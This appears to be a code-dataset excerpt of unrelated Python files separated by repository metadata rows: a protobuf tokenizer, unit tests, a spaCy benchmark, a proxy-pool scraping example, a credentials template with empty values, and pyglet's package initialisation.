'\"([^\"\n\\\\]|\\\\.)*(\"|\\\\?$)|' # a double-quoted string
'\'([^\'\n\\\\]|\\\\.)*(\'|\\\\?$)') # a single-quoted string
_IDENTIFIER = re.compile('\w+')
_INTEGER_CHECKERS = [type_checkers.Uint32ValueChecker(),
type_checkers.Int32ValueChecker(),
type_checkers.Uint64ValueChecker(),
type_checkers.Int64ValueChecker()]
_FLOAT_INFINITY = re.compile('-?inf(inity)?f?', re.IGNORECASE)
_FLOAT_NAN = re.compile("nanf?", re.IGNORECASE)
def __init__(self, text_message):
self._text_message = text_message
self._position = 0
self._line = -1
self._column = 0
self._token_start = None
self.token = ''
self._lines = deque(text_message.split('\n'))
self._current_line = ''
self._previous_line = 0
self._previous_column = 0
self._SkipWhitespace()
self.NextToken()
def AtEnd(self):
"""Checks the end of the text was reached.
Returns:
True iff the end was reached.
"""
return self.token == ''
def _PopLine(self):
while len(self._current_line) <= self._column:
if not self._lines:
self._current_line = ''
return
self._line += 1
self._column = 0
self._current_line = self._lines.popleft()
def _SkipWhitespace(self):
while True:
self._PopLine()
match = self._WHITESPACE.match(self._current_line, self._column)
if not match:
break
length = len(match.group(0))
self._column += length
def TryConsume(self, token):
"""Tries to consume a given piece of text.
Args:
token: Text to consume.
Returns:
True iff the text was consumed.
"""
if self.token == token:
self.NextToken()
return True
return False
def Consume(self, token):
"""Consumes a piece of text.
Args:
token: Text to consume.
Raises:
ParseError: If the text couldn't be consumed.
"""
if not self.TryConsume(token):
raise self._ParseError('Expected "%s".' % token)
def LookingAtInteger(self):
"""Checks if the current token is an integer.
Returns:
True iff the current token is an integer.
"""
if not self.token:
return False
c = self.token[0]
return (c >= '0' and c <= '9') or c == '-' or c == '+'
def ConsumeIdentifier(self):
"""Consumes protocol message field identifier.
Returns:
Identifier string.
Raises:
ParseError: If an identifier couldn't be consumed.
"""
result = self.token
if not self._IDENTIFIER.match(result):
raise self._ParseError('Expected identifier.')
self.NextToken()
return result
def ConsumeInt32(self):
"""Consumes a signed 32bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 32bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=True, is_long=False)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeUint32(self):
"""Consumes an unsigned 32bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 32bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=False, is_long=False)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeInt64(self):
"""Consumes a signed 64bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 64bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=True, is_long=True)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeUint64(self):
"""Consumes an unsigned 64bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 64bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=False, is_long=True)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeFloat(self):
"""Consumes an floating point number.
Returns:
The number parsed.
Raises:
ParseError: If a floating point number couldn't be consumed.
"""
text = self.token
if self._FLOAT_INFINITY.match(text):
self.NextToken()
if text.startswith('-'):
return -_INFINITY
return _INFINITY
if self._FLOAT_NAN.match(text):
self.NextToken()
return _NAN
try:
result = float(text)
except ValueError, e:
raise self._FloatParseError(e)
self.NextToken()
return result
def ConsumeBool(self):
"""Consumes a boolean value.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
if self.token in ('true', 't', '1'):
self.NextToken()
return True
elif self.token in ('false', 'f', '0'):
self.NextToken()
return False
else:
raise self._ParseError('Expected "true" or "false".')
def ConsumeString(self):
"""Consumes a string value.
Returns:
The string parsed.
Raises:
ParseError: If a string value couldn't be consumed.
"""
bytes = self.ConsumeByteString()
try:
return unicode(bytes, 'utf-8')
except UnicodeDecodeError, e:
raise self._StringParseError(e)
def ConsumeByteString(self):
"""Consumes a byte array value.
Returns:
The array parsed (as a string).
Raises:
ParseError: If a byte array value couldn't be consumed.
"""
list = [self._ConsumeSingleByteString()]
while len(self.token) > 0 and self.token[0] in ('\'', '"'):
list.append(self._ConsumeSingleByteString())
return "".join(list)
def _ConsumeSingleByteString(self):
"""Consume one token of a string literal.
String literals (whether bytes or text) can come in multiple adjacent
tokens which are automatically concatenated, like in C or Python. This
method only consumes one token.
"""
text = self.token
if len(text) < 1 or text[0] not in ('\'', '"'):
raise self._ParseError('Exptected string.')
if len(text) < 2 or text[-1] != text[0]:
raise self._ParseError('String missing ending quote.')
try:
result = _CUnescape(text[1:-1])
except ValueError, e:
raise self._ParseError(str(e))
self.NextToken()
return result
def _ParseInteger(self, text, is_signed=False, is_long=False):
"""Parses an integer.
Args:
text: The text to parse.
is_signed: True if a signed integer must be parsed.
is_long: True if a long integer must be parsed.
Returns:
The integer value.
Raises:
ValueError: Thrown Iff the text is not a valid integer.
"""
pos = 0
if text.startswith('-'):
pos += 1
base = 10
if text.startswith('0x', pos) or text.startswith('0X', pos):
base = 16
elif text.startswith('0', pos):
base = 8
# Do the actual parsing. Exception handling is propagated to caller.
result = int(text, base)
# Check if the integer is sane. Exceptions handled by callers.
checker = self._INTEGER_CHECKERS[2 * int(is_long) + int(is_signed)]
checker.CheckValue(result)
return result
def ParseErrorPreviousToken(self, message):
"""Creates and *returns* a ParseError for the previously read token.
Args:
message: A message to set for the exception.
Returns:
A ParseError instance.
"""
return ParseError('%d:%d : %s' % (
self._previous_line + 1, self._previous_column + 1, message))
def _ParseError(self, message):
"""Creates and *returns* a ParseError for the current token."""
return ParseError('%d:%d : %s' % (
self._line + 1, self._column - len(self.token) + 1, message))
def _IntegerParseError(self, e):
return self._ParseError('Couldn\'t parse integer: ' + str(e))
def _FloatParseError(self, e):
return self._ParseError('Couldn\'t parse number: ' + str(e))
def _StringParseError(self, e):
return self._ParseError('Couldn\'t parse string: ' + str(e))
def NextToken(self):
"""Reads the next meaningful token."""
self._previous_line = self._line
self._previous_column = self._column
self._column += len(self.token)
self._SkipWhitespace()
if not self._lines and len(self._current_line) <= self._column:
self.token = ''
return
match = self._TOKEN.match(self._current_line, self._column)
if match:
token = match.group(0)
self.token = token
else:
self.token = self._current_line[self._column]
# text.encode('string_escape') does not seem to satisfy our needs as it
# encodes unprintable characters using two-digit hex escapes whereas our
# C++ unescaping function allows hex escapes to be any length. So,
# "\0011".encode('string_escape') ends up being "\\x011", which will be
# decoded in C++ as a single-character string with char code 0x11.
def _CEscape(text, as_utf8):
def escape(c):
o = ord(c)
if o == 10: return r"\n" # optional escape
if o == 13: return r"\r" # optional escape
if o == 9: return r"\t" # optional escape
if o == 39: return r"\'" # optional escape
if o == 34: return r'\"' # necessary escape
if o == 92: return r"\\" # necessary escape
# necessary escapes
if not as_utf8 and (o >= 127 or o < 32): return "\\%03o" % o
return c
return "".join([escape(c) for c in text])
_CUNESCAPE_HEX = re.compile('\\\\x([0-9a-fA-F]{2}|[0-9a-fA-F])')
def _CUnescape(text):
def ReplaceHex(m):
return chr(int(m.group(0)[2:], 16))
# This is required because the 'string_escape' encoding doesn't
# allow single-digit hex escapes (like '\xf').
result = _CUNESCAPE_HEX.sub(ReplaceHex, text)
return result.decode('string_escape')
| 31.387844 | 79 | 0.669418 |
9ad960a686576a290ce25c35c471ea05346f4786 | 419 | py | Python | src/dsalgo/queue_test.py | kagemeka/python-algorithms | dface89b8c618845cf524429aa8e97c4b2b10ceb | [
"MIT"
] | 1 | 2022-02-10T02:13:07.000Z | 2022-02-10T02:13:07.000Z | src/dsalgo/queue_test.py | kagemeka/python-algorithms | dface89b8c618845cf524429aa8e97c4b2b10ceb | [
"MIT"
] | 6 | 2022-01-05T09:15:54.000Z | 2022-01-09T05:48:43.000Z | src/dsalgo/queue_test.py | kagemeka/python-algorithms | dface89b8c618845cf524429aa8e97c4b2b10ceb | [
"MIT"
] | null | null | null | import unittest
import dsalgo.queue
class Test(unittest.TestCase):
def test_singly_linked_list(self) -> None:
que = dsalgo.queue.SinglyLinkedList[int]()
que.append(1)
self.assertEqual(len(que), 1)
self.assertEqual(que.pop(), 1)
self.assertEqual(len(que), 0)
with self.assertRaises(Exception):
que.pop()
if __name__ == "__main__":
unittest.main()
| 22.052632 | 50 | 0.630072 |
cd88a02de866c1e82cdf9dba42793edc9216ea6b | 2,923 | py | Python | benchmarks/parsetree_benchmark.py | devincornell/sqlitedocuments | 16923bb3b91af5104140e49045efdc612afbc310 | [
"MIT"
] | 1 | 2019-06-19T20:27:55.000Z | 2019-06-19T20:27:55.000Z | benchmarks/parsetree_benchmark.py | devincornell/sqlitedocuments | 16923bb3b91af5104140e49045efdc612afbc310 | [
"MIT"
] | 21 | 2019-04-12T01:08:20.000Z | 2020-11-09T18:28:41.000Z | benchmarks/parsetree_benchmark.py | devincornell/sqlitedocuments | 16923bb3b91af5104140e49045efdc612afbc310 | [
"MIT"
] | null | null | null | import pickle
import pathlib
import spacy
import sys
sys.path.append('..')
import doctable
import timing
import tqdm
import urllib.request
def download_nss(
baseurl='https://raw.githubusercontent.com/devincornell/nssdocs/master/docs/',
years = (1987, 1988, 1990, 1991, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2002, 2006, 2010, 2015, 2017)
):
def read_url(url):
return urllib.request.urlopen(url).read().decode('utf-8')
ftemp = baseurl+'{}.txt'
all_texts = [read_url(ftemp.format(year)) for year in tqdm.tqdm(years)]
return {yr:text for yr,text in zip(years,all_texts)}
def write_trees_pickle(ptrees, fpaths, use_dict=True):
for fpath, ptree in zip(fpaths, ptrees):
if use_dict:
fpath.write_bytes(ptree.as_pickle())
else:
fpath.write_bytes(pickle.dumps(ptree))
def av_file_size(fpaths):
sizes = list()
for fpath in fpaths:
sizes.append(fpath.stat().st_size)
return sum(sizes) / len(sizes)
def read_trees_pickle(fpaths, use_dict=True):
trees = list()
for fpath in fpaths:
if use_dict:
trees.append(doctable.ParseTree.from_pickle(fpath.read_bytes()))
else:
trees.append(pickle.loads(fpath.read_bytes()))
return trees
if __name__ == '__main__':
cache_path = pathlib.Path('tmp_nss/nss_data.pic')
timer = doctable.Timer()
if not cache_path.exists():
timer.step('Downloading nss files.')
nss_texts = download_nss()
timer.step('parsing files')
nlp = spacy.load('en_core_web_sm')
docs = [nlp(text) for yr,text in tqdm.tqdm(nss_texts.items())]
# saving for future use
cache_path.write_bytes(pickle.dumps(docs))
else:
timer.step('cache file found - now reading')
docs = pickle.loads(cache_path.read_bytes())
timer.step('create list of parsetrees')
trees = [doctable.ParseTree.from_spacy(sent) for doc in docs for sent in doc.sents]
print(trees[2])
timer.step('creating file paths')
tmp = doctable.TempFolder('tmp_parsetrees')
fpaths = [tmp.path/f'{i}.pic' for i in range(len(trees))]
timer.step('testing dictionary-based method')
f = lambda: write_trees_pickle(trees, fpaths, use_dict=True)
print(f'dict-based write: {timing.time_call(f)}')
print(f'av filesize: {av_file_size(fpaths)/1000:0.2f} kB')
f = lambda: read_trees_pickle(fpaths, use_dict=True)
print(f'dict-based read: {timing.time_call(f)}')
timer.step('cleaning up files')
for fpath in fpaths:
fpath.unlink()
timer.step('testing raw pickle method')
f = lambda: write_trees_pickle(trees, fpaths, use_dict=False)
print(f'pickle-based write: {timing.time_call(f)}')
print(f'av filesize: {av_file_size(fpaths)/1000:0.2f} kB')
f = lambda: read_trees_pickle(fpaths, use_dict=False)
print(f'pickle-based read: {timing.time_call(f)}')
| 31.430108 | 111 | 0.669176 |
ce026a18d747345384f03f637aa8a2b7c9735496 | 1,529 | py | Python | examples/example.py | jsongmax/proxy_pool | 6e85b474d66a3f1f7bc5b006ea1d042c9ff12e14 | [
"Apache-2.0"
] | 9 | 2019-09-29T05:59:27.000Z | 2020-01-11T04:54:05.000Z | examples/example.py | jsongmax/proxy_pool | 6e85b474d66a3f1f7bc5b006ea1d042c9ff12e14 | [
"Apache-2.0"
] | 3 | 2019-09-29T06:10:56.000Z | 2019-11-29T06:41:02.000Z | examples/example.py | jsongmax/proxy_pool | 6e85b474d66a3f1f7bc5b006ea1d042c9ff12e14 | [
"Apache-2.0"
] | 5 | 2019-09-30T06:35:03.000Z | 2020-09-29T08:07:42.000Z | # -*- coding: utf-8 -*-
import random
import time
import redis
import requests
from fake_useragent import UserAgent
from lxml import etree
# redis连接池
pool = redis.ConnectionPool(host="127.0.0.1", port=6379, db=15)
# 从池子里面取除值
redis_client = redis.Redis(connection_pool=pool, decode_responses=True)
REDIS_KEY = "freeproxies"
def get_proxy_from_redis():
proxy_list = redis_client.zrevrange(REDIS_KEY, 0, 61)
proxy = random.choice(proxy_list)
proxies = {
'http': 'http://{}'.format(proxy.decode('utf-8')),
'https': 'https://{}'.format(proxy.decode('utf-8')),
}
return proxies
def crawler():
headers = {
'User-Agent': UserAgent().random,
}
url = 'https://www.ubaike.cn/show_10672628.html'
for _ in range(1, 61):
proxies = get_proxy_from_redis()
print("当前ip:{}".format(proxies))
res = requests.get(url=url, headers=headers, proxies=proxies, timeout=15)
doc = etree.HTML(res.text)
title = doc.xpath('//h1[@class="title"]/text()')
print("企业名称:{}".format(title))
def statistic_time(function):
def wrapper(*args, **kwargs):
print('[Function {name} start]'.format(name=function.__name__))
start_time = time.time()
result = function(*args, **kwargs)
end_time = time.time()
print('[Function: {name} finished spent time:{time:.2f}s]'.format(name=function.__name__, time=end_time-start_time))
return result
return wrapper
if __name__ == '__main__':
conn = crawler() | 28.314815 | 124 | 0.642904 |
53463d11d35c410f6ad13ce3ecd8c4df4070c00a | 228 | py | Python | Exercicios/exe003.py | EmersonLCruz/Python | a2f2bfdbdcce33ac5f8473b6438a04f9dbd8ce1e | [
"MIT"
] | null | null | null | Exercicios/exe003.py | EmersonLCruz/Python | a2f2bfdbdcce33ac5f8473b6438a04f9dbd8ce1e | [
"MIT"
] | null | null | null | Exercicios/exe003.py | EmersonLCruz/Python | a2f2bfdbdcce33ac5f8473b6438a04f9dbd8ce1e | [
"MIT"
] | null | null | null | # Crie um programa que leia dois números e mostre a soma entre eles.
n1 = int(input('Digite Primeiro Valor:'))
n2 = int(input('Digite Segundo Valor:'))
soma = n1 + n2
print('A soma entre {} e {} é igual a {}'.format(n1,n2,soma)) | 45.6 | 68 | 0.679825 |
3b5228e6bdb739d6fdc649837c0fd893bda9ca92 | 105 | py | Python | secrets.template.py | basilleaf/curated_retweet_bot | fb028b04c7ead353e820dad332e95e81c5e91376 | [
"MIT"
] | null | null | null | secrets.template.py | basilleaf/curated_retweet_bot | fb028b04c7ead353e820dad332e95e81c5e91376 | [
"MIT"
] | 2 | 2015-08-05T20:32:58.000Z | 2016-11-18T21:59:31.000Z | secrets.template.py | basilleaf/fav_retweet_bot | fb028b04c7ead353e820dad332e95e81c5e91376 | [
"MIT"
] | null | null | null | # twitter auth creds
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
| 17.5 | 24 | 0.704762 |
4c2e61e636efee10e089ef1962ecd5aad481cba2 | 7,729 | py | Python | tests/unit/test_default_connection.py | festicket/connect-sdk-python3 | c399c6443789dd978f319c89e1ebd387c812a77b | [
"MIT"
] | 12 | 2016-09-26T21:46:31.000Z | 2020-12-23T18:44:54.000Z | tests/unit/test_default_connection.py | festicket/connect-sdk-python3 | c399c6443789dd978f319c89e1ebd387c812a77b | [
"MIT"
] | 3 | 2020-05-02T16:53:02.000Z | 2020-06-02T12:49:51.000Z | tests/unit/test_default_connection.py | festicket/connect-sdk-python3 | c399c6443789dd978f319c89e1ebd387c812a77b | [
"MIT"
] | 11 | 2017-07-16T00:55:28.000Z | 2021-09-24T17:00:49.000Z | import unittest
import warnings
from ingenico.connect.sdk.communicator_configuration import CommunicatorConfiguration
from ingenico.connect.sdk.log.response_log_message import ResponseLogMessage
from ingenico.connect.sdk.log.sys_out_communicator_logger import SysOutCommunicatorLogger
from ingenico.connect.sdk.defaultimpl.default_connection import DefaultConnection
from ingenico.connect.sdk.proxy_configuration import ProxyConfiguration
CONNECT_TIMEOUT = 10
SOCKET_TIMEOUT = 20
MAX_CONNECTIONS = 100
# noinspection PyTypeChecker
class DefaultConnectionTest(unittest.TestCase):
"""Tests that a DefaultConnection can be constructed with a multitude of settings"""
def test_log_unicode_2(self):
"""Tests if requests can be logged correctly"""
logger = SysOutCommunicatorLogger()
message = ResponseLogMessage(request_id="aaa",
status_code=2345,
duration=45.32)
body = u"Schr\xf6der"
content = "JSON"
message.set_body(body, content)
logger.log_response(message)
def test_log_unicode(self):
"""Tests if requests can be logged correctly"""
logger = SysOutCommunicatorLogger()
message = ResponseLogMessage(request_id="aaa",
status_code=2345,
duration=45.32)
body = u"Schr\u0e23\u0e16der"
content = "JSON"
message.set_body(body, content)
logger.log_response(message)
def test_construct_without_proxy(self):
"""Tests construction of a DefaultConnection without using a proxy"""
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection, CommunicatorConfiguration.DEFAULT_MAX_CONNECTIONS, None)
self.assertNoProxy(self, connection)
def test_construct_with_proxy_without_authentication(self):
"""Tests construction of a DefaultConnection with an unauthenticated proxy"""
proxy_config = ProxyConfiguration.from_uri("http://test-proxy")
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT, proxy_configuration=proxy_config)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection,
CommunicatorConfiguration.DEFAULT_MAX_CONNECTIONS, proxy_config)
self.assertProxy(self, connection, proxy_config)
def test_construct_with_proxy_with_authentication(self):
"""Tests construction of a DefaultConnection with an authenticated proxy"""
proxy_config = ProxyConfiguration.from_uri("http://test-proxy", "test-username", "test-password")
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT, proxy_configuration=proxy_config)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection,
CommunicatorConfiguration.DEFAULT_MAX_CONNECTIONS, proxy_config)
self.assertProxy(self, connection, proxy_config)
def test_construct_with_max_connections_without_proxy(self):
"""Tests construction of a DefaultConnection with a different amount of max connections and no proxy"""
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT, MAX_CONNECTIONS)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection, MAX_CONNECTIONS, None)
self.assertNoProxy(self, connection)
def test_construct_with_max_connections_with_proxy(self):
"""Tests construction of a DefaultConnection
with a different amount of max connections and an unauthenticated proxy
"""
proxy_config = ProxyConfiguration.from_uri("http://test-proxy")
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT,
MAX_CONNECTIONS, proxy_configuration=proxy_config)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection, MAX_CONNECTIONS, proxy_config)
self.assertProxy(self, connection, proxy_config)
@staticmethod
def assertNoProxy(test_instance, default_connection):
"""Asserts that the default_connection does not have any proxy settings contained within"""
test_instance.assertFalse(default_connection._DefaultConnection__requests_session.proxies)
@staticmethod
def assertProxy(test_instance, connection, proxy_configuration):
"""Asserts that the proxy data inside the connection is consistent with the data in proxy_configuration"""
test_instance.assertIn(str(proxy_configuration),
list(connection._DefaultConnection__requests_session.proxies.values()))
@staticmethod
def assertConnection(test_instance, default_connection, connect_timeout, socket_timeout,
max_connections, proxy_configuration=None):
"""Asserts that the default_connection parameter has properties conform
the connect_timeout, the socket_timeout, max_connections and the proxy_configuration
"""
DefaultConnectionTest.assertTimeouts(test_instance, default_connection, connect_timeout, socket_timeout)
DefaultConnectionTest.assertMaxConnections(test_instance, default_connection, max_connections,
proxy_configuration)
if proxy_configuration is not None:
DefaultConnectionTest.assertProxy(test_instance, default_connection, proxy_configuration)
else:
DefaultConnectionTest.assertNoProxy(test_instance, default_connection)
@staticmethod
def assertTimeouts(test_instance, connection, connection_timeout, socket_timeout):
"""Asserts that the settings in the request config of the connection have the proper timeout settings"""
test_instance.assertEqual(connection_timeout, connection.connect_timeout)
test_instance.assertEqual(socket_timeout, connection.socket_timeout)
@staticmethod
def assertMaxConnections(test_instance, connection, max_connections, proxy_configuration):
"""Asserts that the connection has the correct setting for max_connections and proxy_configuration"""
requests_session = connection._DefaultConnection__requests_session
try:
http_poolsize = requests_session.get_adapter("http://")._pool_maxsize
https_poolsize = requests_session.get_adapter("https://")._pool_maxsize
test_instance.assertEqual(http_poolsize,
https_poolsize) # requests stores its poolsize as a per-host variable
except Exception as e:
if isinstance(e, AssertionError):
raise e
else:
print("Could not access max_connections attribute in libary for validation")
# proxy settings are deeply embedded in requests, we don't check them here
if __name__ == '__main__':
unittest.main()
| 50.51634 | 114 | 0.709018 |
ce66a754b61765ee75423b8d3fce7da4505ffbbd | 14,373 | py | Python | pyglet/__init__.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | null | null | null | pyglet/__init__.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | null | null | null | pyglet/__init__.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | null | null | null | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''pyglet is a cross-platform games and multimedia package.
Detailed documentation is available at http://www.pyglet.org
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import os
import sys
_is_epydoc = hasattr(sys, 'is_epydoc') and sys.is_epydoc
#: The release version of this pyglet installation.
#:
#: Valid only if pyglet was installed from a source or binary distribution
#: (i.e. not in a checked-out copy from SVN).
#:
#: Use setuptools if you need to check for a specific release version, e.g.::
#:
#: >>> import pyglet
#: >>> from pkg_resources import parse_version
#: >>> parse_version(pyglet.version) >= parse_version('1.1')
#: True
#:
version = '1.2.1'
# Pyglet platform treats *BSD systems as Linux
compat_platform = sys.platform
if "bsd" in compat_platform:
compat_platform = "linux-compat"
def _require_ctypes_version(version):
# Check ctypes version
import ctypes
req = [int(i) for i in version.split('.')]
have = [int(i) for i in ctypes.__version__.split('.')]
if not tuple(have) >= tuple(req):
raise ImportError('pyglet requires ctypes %s or later.' % version)
_require_ctypes_version('1.0.0')
_enable_optimisations = not __debug__
if getattr(sys, 'frozen', None):
_enable_optimisations = True
#: Global dict of pyglet options. To change an option from its default, you
#: must import ``pyglet`` before any sub-packages. For example::
#:
#: import pyglet
#: pyglet.options['debug_gl'] = False
#:
#: The default options can be overridden from the OS environment. The
#: corresponding environment variable for each option key is prefaced by
#: ``PYGLET_``. For example, in Bash you can set the ``debug_gl`` option with::
#:
#: PYGLET_DEBUG_GL=True; export PYGLET_DEBUG_GL
#:
#: For options requiring a tuple of values, separate each value with a comma.
#:
#: The non-development options are:
#:
#: audio
#: A sequence of the names of audio modules to attempt to load, in
#: order of preference. Valid driver names are:
#:
#: * directsound, the Windows DirectSound audio module (Windows only)
#: * pulse, the PulseAudio module (Linux only)
#: * openal, the OpenAL audio module
#: * silent, no audio
#: debug_lib
#: If True, prints the path of each dynamic library loaded.
#: debug_gl
#: If True, all calls to OpenGL functions are checked afterwards for
#: errors using ``glGetError``. This will severely impact performance,
#: but provides useful exceptions at the point of failure. By default,
#: this option is enabled if ``__debug__`` is (i.e., if Python was not run
#: with the -O option). It is disabled by default when pyglet is "frozen"
#: within a py2exe or py2app library archive.
#: shadow_window
#: By default, pyglet creates a hidden window with a GL context when
#: pyglet.gl is imported. This allows resources to be loaded before
#: the application window is created, and permits GL objects to be
#: shared between windows even after they've been closed. You can
#: disable the creation of the shadow window by setting this option to
#: False.
#:
#: Some OpenGL driver implementations may not support shared OpenGL
#: contexts and may require disabling the shadow window (and all resources
#: must be loaded after the window using them was created). Recommended
#: for advanced developers only.
#:
#: **Since:** pyglet 1.1
#: vsync
#: If set, the `pyglet.window.Window.vsync` property is ignored, and
#: this option overrides it (to either force vsync on or off). If unset,
#: or set to None, the `pyglet.window.Window.vsync` property behaves
#: as documented.
#: xsync
#: If set (the default), pyglet will attempt to synchronise the drawing of
#: double-buffered windows to the border updates of the X11 window
#: manager. This improves the appearance of the window during resize
#: operations. This option only affects double-buffered windows on
#: X11 servers supporting the Xsync extension with a window manager
#: that implements the _NET_WM_SYNC_REQUEST protocol.
#:
#: **Since:** pyglet 1.1
#: darwin_cocoa
#: If True, the Cocoa-based pyglet implementation is used as opposed to
#: the 32-bit Carbon implementation. When python is running in 64-bit mode
#: on Mac OS X 10.6 or later, this option is set to True by default.
#: Otherwise the Carbon implementation is preferred.
#:
#: **Since:** pyglet 1.2
#:
#: search_local_libs
#: If False, pyglet won't try to search for libraries in the script
#: directory and its `lib` subdirectory. This is useful to load a local
#: library instead of the system installed version. This option is set
#: to True by default.
#:
#: **Since:** pyglet 1.2
#:
options = {
'audio': ('directsound', 'pulse', 'openal', 'silent'),
'font': ('gdiplus', 'win32'), # ignored outside win32; win32 is deprecated
'debug_font': False,
'debug_gl': not _enable_optimisations,
'debug_gl_trace': False,
'debug_gl_trace_args': False,
'debug_graphics_batch': False,
'debug_lib': False,
'debug_media': False,
'debug_texture': False,
'debug_trace': False,
'debug_trace_args': False,
'debug_trace_depth': 1,
'debug_trace_flush': True,
'debug_win32': False,
'debug_x11': False,
'graphics_vbo': True,
'shadow_window': True,
'vsync': None,
'xsync': True,
'xlib_fullscreen_override_redirect': False,
'darwin_cocoa': False,
'search_local_libs': True,
}
_option_types = {
'audio': tuple,
'font': tuple,
'debug_font': bool,
'debug_gl': bool,
'debug_gl_trace': bool,
'debug_gl_trace_args': bool,
'debug_graphics_batch': bool,
'debug_lib': bool,
'debug_media': bool,
'debug_texture': bool,
'debug_trace': bool,
'debug_trace_args': bool,
'debug_trace_depth': int,
'debug_trace_flush': bool,
'debug_win32': bool,
'debug_x11': bool,
'graphics_vbo': bool,
'shadow_window': bool,
'vsync': bool,
'xsync': bool,
'xlib_fullscreen_override_redirect': bool,
'darwin_cocoa': bool,
}
def _choose_darwin_platform():
"""Choose between Darwin's Carbon and Cocoa implementations."""
if compat_platform != 'darwin':
return
import struct
numbits = 8*struct.calcsize("P")
if numbits == 64:
import platform
osx_version = platform.mac_ver()[0].split(".")
if int(osx_version[0]) == 10 and int(osx_version[1]) < 6:
raise Exception('pyglet is not compatible with 64-bit Python for versions of Mac OS X prior to 10.6.')
options['darwin_cocoa'] = True
else:
options['darwin_cocoa'] = False
_choose_darwin_platform() # can be overridden by an environment variable below
def _read_environment():
'''Read defaults for options from environment'''
for key in options:
env = 'PYGLET_%s' % key.upper()
try:
value = os.environ[env]
if _option_types[key] is tuple:
options[key] = value.split(',')
elif _option_types[key] is bool:
options[key] = value in ('true', 'TRUE', 'True', '1')
elif _option_types[key] is int:
options[key] = int(value)
except KeyError:
pass
_read_environment()
if compat_platform == 'cygwin':
# This hack pretends that the posix-like ctypes provides windows
# functionality. COM does not work with this hack, so there is no
# DirectSound support.
import ctypes
ctypes.windll = ctypes.cdll
ctypes.oledll = ctypes.cdll
ctypes.WINFUNCTYPE = ctypes.CFUNCTYPE
ctypes.HRESULT = ctypes.c_long
# Call tracing
# ------------
_trace_filename_abbreviations = {}
def _trace_repr(value, size=40):
value = repr(value)
if len(value) > size:
value = value[:size//2-2] + '...' + value[-size//2-1:]
return value
def _trace_frame(thread, frame, indent):
from pyglet import lib
if frame.f_code is lib._TraceFunction.__call__.func_code:
is_ctypes = True
func = frame.f_locals['self']._func
name = func.__name__
location = '[ctypes]'
else:
is_ctypes = False
code = frame.f_code
name = code.co_name
path = code.co_filename
line = code.co_firstlineno
